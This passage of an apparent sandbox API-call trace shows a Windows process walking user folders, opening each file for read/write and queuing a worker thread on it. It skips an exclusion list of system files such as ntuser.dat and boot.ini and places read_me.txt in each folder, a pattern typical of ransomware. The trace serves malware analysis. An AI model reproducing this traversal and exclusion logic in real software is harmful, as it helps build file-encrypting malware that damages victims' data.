ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.985] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\..") returned 64 [0075.985] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd3fa1e0, ftCreationTime.dwHighDateTime=0x1d4cc4b, ftLastAccessTime.dwLowDateTime=0x93b8e3c0, ftLastAccessTime.dwHighDateTime=0x1d4c87a, ftLastWriteTime.dwLowDateTime=0x93b8e3c0, ftLastWriteTime.dwHighDateTime=0x1d4c87a, nFileSizeHigh=0x0, nFileSizeLow=0xaad1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6Moq2t5E7ltI2YT.mp4", cAlternateFileName="6MOQ2T~1.MP4")) returned 1 [0075.985] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\6Moq2t5E7ltI2YT.mp4") returned 81 [0075.985] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\6Moq2t5E7ltI2YT.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4aqclz9qavwtjc5qkbv\\6moq2t5e7lti2yt.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x808 [0075.985] StrStrW (lpFirst="6moq2t5e7lti2yt.mp4", lpSrch="read_me.txt") returned 0x0 [0075.985] StrStrW (lpFirst="6moq2t5e7lti2yt.mp4", lpSrch="autoexec.bat") returned 0x0 [0075.985] StrStrW (lpFirst="6moq2t5e7lti2yt.mp4", lpSrch="desktop.ini") returned 0x0 [0075.985] StrStrW (lpFirst="6moq2t5e7lti2yt.mp4", lpSrch="autorun.inf") returned 0x0 [0075.985] StrStrW (lpFirst="6moq2t5e7lti2yt.mp4", lpSrch="ntuser.dat") returned 0x0 [0075.985] StrStrW (lpFirst="6moq2t5e7lti2yt.mp4", lpSrch="iconcache.db") returned 0x0 [0075.985] StrStrW (lpFirst="6moq2t5e7lti2yt.mp4", lpSrch="bootsect.bak") returned 0x0 [0075.985] StrStrW (lpFirst="6moq2t5e7lti2yt.mp4", lpSrch="boot.ini") returned 0x0 [0075.985] StrStrW (lpFirst="6moq2t5e7lti2yt.mp4", lpSrch="ntuser.dat.log") returned 0x0 [0075.985] StrStrW (lpFirst="6moq2t5e7lti2yt.mp4", lpSrch="thumbs.db") returned 0x0 [0075.985] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 34 [0075.985] QueueUserWorkItem (Function=0x404e00, Context=0x808, Flags=0x0) returned 1 [0075.985] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cf13e40, ftCreationTime.dwHighDateTime=0x1d4d093, ftLastAccessTime.dwLowDateTime=0x246a5360, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x246a5360, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="j9-MN6", cAlternateFileName="")) returned 1 [0075.985] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6") returned 68 [0075.985] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f567940, ftCreationTime.dwHighDateTime=0x1d4ce82, ftLastAccessTime.dwLowDateTime=0xa5f25640, ftLastAccessTime.dwHighDateTime=0x1d4cf76, ftLastWriteTime.dwLowDateTime=0xa5f25640, ftLastWriteTime.dwHighDateTime=0x1d4cf76, nFileSizeHigh=0x0, nFileSizeLow=0x68d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MymW-P0.gif", cAlternateFileName="")) returned 1 [0075.986] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\MymW-P0.gif") returned 73 [0075.986] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\MymW-P0.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4aqclz9qavwtjc5qkbv\\mymw-p0.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x80c [0075.986] StrStrW (lpFirst="mymw-p0.gif", lpSrch="read_me.txt") returned 0x0 [0075.986] StrStrW (lpFirst="mymw-p0.gif", lpSrch="autoexec.bat") returned 0x0 [0075.986] StrStrW (lpFirst="mymw-p0.gif", lpSrch="desktop.ini") returned 0x0 [0075.986] StrStrW (lpFirst="mymw-p0.gif", lpSrch="autorun.inf") returned 0x0 [0075.986] StrStrW (lpFirst="mymw-p0.gif", lpSrch="ntuser.dat") returned 0x0 [0075.986] StrStrW (lpFirst="mymw-p0.gif", lpSrch="iconcache.db") returned 0x0 [0075.986] StrStrW (lpFirst="mymw-p0.gif", lpSrch="bootsect.bak") returned 0x0 [0075.986] StrStrW (lpFirst="mymw-p0.gif", lpSrch="boot.ini") returned 0x0 [0075.986] StrStrW (lpFirst="mymw-p0.gif", lpSrch="ntuser.dat.log") returned 0x0 [0075.986] StrStrW (lpFirst="mymw-p0.gif", lpSrch="thumbs.db") returned 0x0 [0075.986] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 35 [0075.986] QueueUserWorkItem (Function=0x404e00, Context=0x80c, Flags=0x0) returned 1 [0075.986] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x246a5360, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x246a5360, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x246a5360, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0075.986] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\read_me.txt") returned 73 [0075.986] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4aqclz9qavwtjc5qkbv\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x810 [0075.986] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0075.986] CloseHandle (hObject=0x810) returned 1 [0075.986] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x246a5360, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x246a5360, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x246a5360, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0075.987] FindClose (in: hFindFile=0x7cfe9e8 | out: hFindFile=0x7cfe9e8) returned 1 [0075.987] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\read_me.txt") returned 73 [0075.987] GetProcessHeap () returned 0x4f10000 [0075.987] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8e31128 | out: hHeap=0x4f10000) returned 1 [0075.987] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 39 [0075.987] GetProcessHeap () returned 0x4f10000 [0075.987] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b400a8 | out: hHeap=0x4f10000) returned 1 [0076.072] GetProcessHeap () returned 0x4f10000 [0076.073] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8df1108 [0076.073] wnsprintfW (in: pszDest=0x8df1108, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*") returned 64 [0076.073] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x2499eee0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2499eee0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0076.073] wnsprintfW (in: pszDest=0x8df1108, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\.") returned 64 [0076.073] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x2499eee0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2499eee0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.073] wnsprintfW (in: pszDest=0x8df1108, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\..") returned 65 [0076.073] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0076.073] wnsprintfW (in: pszDest=0x8df1108, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico") returned 73 [0076.073] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8f0 [0076.081] StrStrW (lpFirst="folder.ico", lpSrch="read_me.txt") returned 0x0 [0076.081] StrStrW (lpFirst="folder.ico", lpSrch="autoexec.bat") returned 0x0 [0076.081] StrStrW (lpFirst="folder.ico", lpSrch="desktop.ini") returned 0x0 [0076.081] StrStrW (lpFirst="folder.ico", lpSrch="autorun.inf") returned 0x0 [0076.081] StrStrW (lpFirst="folder.ico", lpSrch="ntuser.dat") returned 0x0 [0076.081] StrStrW (lpFirst="folder.ico", lpSrch="iconcache.db") returned 0x0 [0076.081] StrStrW (lpFirst="folder.ico", lpSrch="bootsect.bak") returned 0x0 [0076.081] StrStrW (lpFirst="folder.ico", lpSrch="boot.ini") returned 0x0 [0076.081] StrStrW (lpFirst="folder.ico", lpSrch="ntuser.dat.log") returned 0x0 [0076.081] StrStrW (lpFirst="folder.ico", lpSrch="thumbs.db") returned 0x0 [0076.081] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 93 [0076.081] QueueUserWorkItem (Function=0x404e00, Context=0x8f0, Flags=0x0) returned 1 [0076.081] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2499eee0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x2499eee0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2499eee0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.081] wnsprintfW (in: pszDest=0x8df1108, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\read_me.txt") returned 74 [0076.081] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8f4 [0076.082] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0076.082] CloseHandle (hObject=0x8f4) returned 1 [0076.082] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2499eee0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x2499eee0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2499eee0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0076.082] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0076.082] wnsprintfW (in: pszDest=0x8df1108, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\read_me.txt") returned 74 [0076.082] GetProcessHeap () returned 0x4f10000 [0076.082] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8df1108 | out: hHeap=0x4f10000) returned 1 [0076.082] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 56 [0076.082] GetProcessHeap () returned 0x4f10000 [0076.082] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0076.121] GetProcessHeap () returned 0x4f10000 [0076.121] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b400a8 [0076.121] wnsprintfW (in: pszDest=0x8b400a8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*") returned 64 [0076.122] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24a37460, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24a37460, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe9e8 [0076.122] wnsprintfW (in: pszDest=0x8b400a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\.") returned 64 [0076.122] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24a37460, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24a37460, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.122] wnsprintfW (in: pszDest=0x8b400a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\..") returned 65 [0076.122] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0076.122] wnsprintfW (in: pszDest=0x8b400a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 81 [0076.122] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x900 [0076.122] StrStrW (lpFirst="ie add-on site.url", lpSrch="read_me.txt") returned 0x0 [0076.122] StrStrW (lpFirst="ie add-on site.url", lpSrch="autoexec.bat") returned 0x0 [0076.122] StrStrW (lpFirst="ie add-on site.url", lpSrch="desktop.ini") returned 0x0 [0076.123] StrStrW (lpFirst="ie add-on site.url", lpSrch="autorun.inf") returned 0x0 [0076.123] StrStrW (lpFirst="ie add-on site.url", lpSrch="ntuser.dat") returned 0x0 [0076.123] StrStrW (lpFirst="ie add-on site.url", lpSrch="iconcache.db") returned 0x0 [0076.123] StrStrW (lpFirst="ie add-on site.url", lpSrch="bootsect.bak") returned 0x0 [0076.123] StrStrW (lpFirst="ie add-on site.url", lpSrch="boot.ini") returned 0x0 [0076.123] StrStrW (lpFirst="ie add-on site.url", lpSrch="ntuser.dat.log") returned 0x0 [0076.123] StrStrW (lpFirst="ie add-on site.url", lpSrch="thumbs.db") returned 0x0 [0076.123] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 96 [0076.123] QueueUserWorkItem (Function=0x404e00, Context=0x900, Flags=0x0) returned 1 [0076.123] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0076.123] wnsprintfW (in: pszDest=0x8b400a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 91 [0076.123] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x904 [0076.123] StrStrW (lpFirst="ie site on microsoft.com.url", lpSrch="read_me.txt") returned 0x0 [0076.123] StrStrW (lpFirst="ie site on microsoft.com.url", lpSrch="autoexec.bat") returned 0x0 [0076.123] StrStrW (lpFirst="ie site on microsoft.com.url", lpSrch="desktop.ini") returned 0x0 [0076.123] StrStrW (lpFirst="ie site on microsoft.com.url", lpSrch="autorun.inf") returned 0x0 [0076.123] StrStrW (lpFirst="ie site on microsoft.com.url", lpSrch="ntuser.dat") returned 0x0 [0076.123] StrStrW (lpFirst="ie site on microsoft.com.url", lpSrch="iconcache.db") returned 0x0 [0076.123] StrStrW (lpFirst="ie site on microsoft.com.url", lpSrch="bootsect.bak") returned 0x0 [0076.123] StrStrW (lpFirst="ie site on microsoft.com.url", lpSrch="boot.ini") returned 0x0 [0076.123] StrStrW (lpFirst="ie site on microsoft.com.url", lpSrch="ntuser.dat.log") returned 0x0 [0076.124] StrStrW (lpFirst="ie site on microsoft.com.url", lpSrch="thumbs.db") returned 0x0 [0076.124] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 97 [0076.124] QueueUserWorkItem (Function=0x404e00, Context=0x904, Flags=0x0) returned 1 [0076.124] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0076.124] wnsprintfW (in: pszDest=0x8b400a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 84 [0076.124] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x908 [0076.124] StrStrW (lpFirst="microsoft at home.url", lpSrch="read_me.txt") returned 0x0 [0076.124] StrStrW (lpFirst="microsoft at home.url", lpSrch="autoexec.bat") returned 0x0 [0076.124] StrStrW (lpFirst="microsoft at home.url", lpSrch="desktop.ini") returned 0x0 [0076.124] StrStrW (lpFirst="microsoft at home.url", lpSrch="autorun.inf") returned 0x0 [0076.124] StrStrW (lpFirst="microsoft at home.url", lpSrch="ntuser.dat") returned 0x0 [0076.124] StrStrW (lpFirst="microsoft at home.url", lpSrch="iconcache.db") returned 0x0 [0076.124] StrStrW (lpFirst="microsoft at home.url", lpSrch="bootsect.bak") returned 0x0 [0076.124] StrStrW (lpFirst="microsoft at home.url", lpSrch="boot.ini") returned 0x0 [0076.124] StrStrW (lpFirst="microsoft at home.url", lpSrch="ntuser.dat.log") returned 0x0 [0076.124] StrStrW (lpFirst="microsoft at home.url", lpSrch="thumbs.db") returned 0x0 [0076.124] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 98 [0076.124] QueueUserWorkItem (Function=0x404e00, Context=0x908, Flags=0x0) returned 1 [0076.124] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0076.124] wnsprintfW (in: pszDest=0x8b400a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 84 [0076.124] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90c [0076.125] StrStrW (lpFirst="microsoft at work.url", lpSrch="read_me.txt") returned 0x0 [0076.125] StrStrW (lpFirst="microsoft at work.url", lpSrch="autoexec.bat") returned 0x0 [0076.125] StrStrW (lpFirst="microsoft at work.url", lpSrch="desktop.ini") returned 0x0 [0076.125] StrStrW (lpFirst="microsoft at work.url", lpSrch="autorun.inf") returned 0x0 [0076.125] StrStrW (lpFirst="microsoft at work.url", lpSrch="ntuser.dat") returned 0x0 [0076.125] StrStrW (lpFirst="microsoft at work.url", lpSrch="iconcache.db") returned 0x0 [0076.125] StrStrW (lpFirst="microsoft at work.url", lpSrch="bootsect.bak") returned 0x0 [0076.125] StrStrW (lpFirst="microsoft at work.url", lpSrch="boot.ini") returned 0x0 [0076.125] StrStrW (lpFirst="microsoft at work.url", lpSrch="ntuser.dat.log") returned 0x0 [0076.125] StrStrW (lpFirst="microsoft at work.url", lpSrch="thumbs.db") returned 0x0 [0076.125] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 99 [0076.125] QueueUserWorkItem (Function=0x404e00, Context=0x90c, Flags=0x0) returned 1 [0076.125] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, 